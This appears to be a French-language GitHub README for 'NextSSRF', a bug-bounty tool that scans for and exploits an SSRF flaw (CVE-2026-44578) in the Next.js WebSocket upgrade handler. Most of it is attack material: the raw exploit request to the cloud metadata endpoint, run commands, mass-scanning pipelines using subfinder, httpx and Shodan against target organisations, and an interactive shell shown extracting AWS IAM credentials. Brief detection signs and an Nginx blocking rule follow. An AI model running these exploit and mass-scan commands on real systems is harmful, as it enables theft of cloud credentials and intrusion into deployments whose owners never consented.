
Outil de scan et d'exploitation de la CVE-2026-44578 pour SSRF dans le gestionnaire de mise à niveau WebSocket de Next.js. Détecte les versions vulnérables, extrait les métadonnées cloud et exfiltre les identifiants IAM via un shell interactif.
╔══════════════════════════════════════════════════════════════╗
║ NextSSRF — CVE-2026-44578 Scanner & Exploit ║
║ Next.js WebSocket Upgrade Handler SSRF ║
║ Affected: 13.4.13 → 15.5.15, 16.0.0 → 16.2.4 ║
║ @mitsec / ynsmroztas — Bug Bounty Tooling ║
╚══════════════════════════════════════════════════════════════╝
CVE-2026-44578 — Server-Side Request Forgery via le gestionnaire de mise à niveau WebSocket de Next.js
Aperçu · Installation · Utilisation · Exemples de pipeline · Shodan · Shell interactif · Avertissement
Le 11 mai 2026, Vercel a corrigé CVE-2026-44578 (CVSS 8.6) : une SSRF non authentifiée dans le gestionnaire de mise à niveau WebSocket de Next.js affectant tous les déploiements auto-hébergés à partir de la version 13.4.13.
GET http://169.254.169.254/latest/meta-data/ HTTP/1.1 ← absolute-form URI
Host: vulnerable-nextjs.com
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Le // dans http:// déclenche la sortie anticipée de normalizeRepeatedSlashes, définissant statusCode: 308 et finished: true. Le gestionnaire de mise à niveau vulnérable ignore ces deux indicateurs et appelle proxyRequest lorsque parsedUrl.protocol est truthy — en proxyant la requête vers l'hôte contrôlé par l'attaquant sur le port 80.
// router-server.ts (vulnerable)
- if (parsedUrl.protocol) {
- return await proxyRequest(req, socket, parsedUrl, head)
+ if (finished && parsedUrl.protocol) {
+ if (!statusCode) {
+ return await proxyRequest(req, socket, parsedUrl, head)
| Produit | Vulnérable | Corrigé |
|---|---|---|
| Next.js | 13.4.13 – 15.5.15 | 15.5.16 |
| Next.js | 16.0.0 – 16.2.4 | 16.2.5 |
| Hébergé sur Vercel | ✅ Non affecté | N/A |
Upgrade: websocket avec un code 400
Identifiants AWS IMDSv1 exfiltrés via CVE-2026-44578 — shell d'exploitation interactif
git clone https://github.com/ynsmroztas/nextssrf
cd nextssrf
python3 nextssrf.py -t https://target.com
Zéro dépendance — uniquement la bibliothèque standard de Python. Python 3.10+ requis.
python3 nextssrf.py -t https://target.com
# AWS metadata only
python3 nextssrf.py -t https://target.com --cloud aws
# Custom internal target
python3 nextssrf.py -t https://target.com \
--ssrf-host http://internal-api --path /admin
# Deep scan (+ internal services)
python3 nextssrf.py -t https://target.com --cloud aws --deep
# subfinder + httpx + nextssrf
subfinder -d target.com | httpx -silent | \
python3 nextssrf.py --pipe --threads 20 --cloud aws -o results.jsonl
# File input
python3 nextssrf.py -f targets.txt --threads 15 -o results.json
# Force scan (even if version unknown)
python3 nextssrf.py -t https://target.com --force
| Code | Signification |
|---|---|
0 | Non vulnérable / propre |
1 | Vulnérable (sans exploitation) |
2 | SSRF confirmée |
Shell d'exploitation avancé avec détection automatique du cloud et extraction des identifiants IAM :
python3 nextssrf.py -t https://target.com
╔══════════════════════════════════════════════════╗
║ NextSSRF v2 — Interactive Exploit Shell ║
║ Target : ec2-x-x-x-x.compute.amazonaws.com ║
║ CVE : CVE-2026-44578 | Status: Connected ║
╚══════════════════════════════════════════════════╝
nextssrf(ec2-x...)> cloud
[>] Detecting cloud provider...
✓ AWS — matched: ['ami-id', 'instance-id', 'iam/', 'hostname']
→ Run 'aws' for full credential extraction
nextssrf(ec2-x...)> aws
[1/3] Instance Information
[200] Hostname : ip-172-31-47-134.ec2.internal
[200] AZ : us-east-1d
[200] Account ID : {"AccountId": "370741706736"}
[2/3] IAM Role Discovery
✓ IAM Role found: my-ec2-role
[3/3] Credential Extraction
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
🎯 AWS CREDENTIALS EXFILTRATED!
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
AccessKeyId : ASIAXXXXXXXXXXXXXXXXXX
SecretKey : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Expiration : 2026-05-14T22:32:22Z
# Detect cloud + run full exploit chain automatically
python3 nextssrf.py -t https://target.com --auto
# Full recon → exploit pipeline
subfinder -d target.com \
| httpx -silent -server \
| grep -i "next" \
| python3 nextssrf.py --pipe --cloud aws --deep -o findings.jsonl
# Shodan mass scan → interactive on confirmed hosts
python3 shodan_nextjs.py --key KEY --org "TargetCorp" \
| python3 nextssrf.py --pipe --cloud aws -o hits.jsonl
# Check specific version range
cat hosts.txt \
| python3 nextssrf.py --pipe --force --cloud aws \
| jq '.[] | select(.ssrf_hits | length > 0)'
Signes d'exploitation dans les journaux :
# Next.js process logs
Failed to proxy http:/ ← single slash = normalization fingerprint
# Access logs (absolute-form URI + Upgrade header)
GET http://169.254.169.254/... HTTP/1.1
Connection: Upgrade
Upgrade: websocket
# Nginx: reject absolute-form request URIs
if ($request_uri ~* "^https?://") {
return 400;
}
Uniquement pour les tests de sécurité autorisés et la recherche bug bounty. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite. Les auteurs ne sont pas responsables d'une utilisation abusive ou non autorisée. Suivez toujours les règles d'engagement de votre programme bug bounty.
Fait avec ❤️ par @mitsec · ynsmroztas.github.io
Top Hacker @ Intigriti · 100+ HOF · 2430+ vulnérabilités · 1100+ P1 critiques
| Commande | Description |
|---|
cloud | Détection automatique du cloud (AWS/Azure/GCP/DO/OCI) |
aws | Chaîne complète d'identifiants AWS IAM |
azure | Jeton d'identité managée Azure |
scan | Détection cloud + exploitation automatique |
url <http://> | Requête SSRF personnalisée |
get <N> | Cible IMDS AWS par index |
list | Afficher tous les endpoints IMDS |
history | Historique des requêtes |
save | Exporter la session en JSON |
quit | Quitter |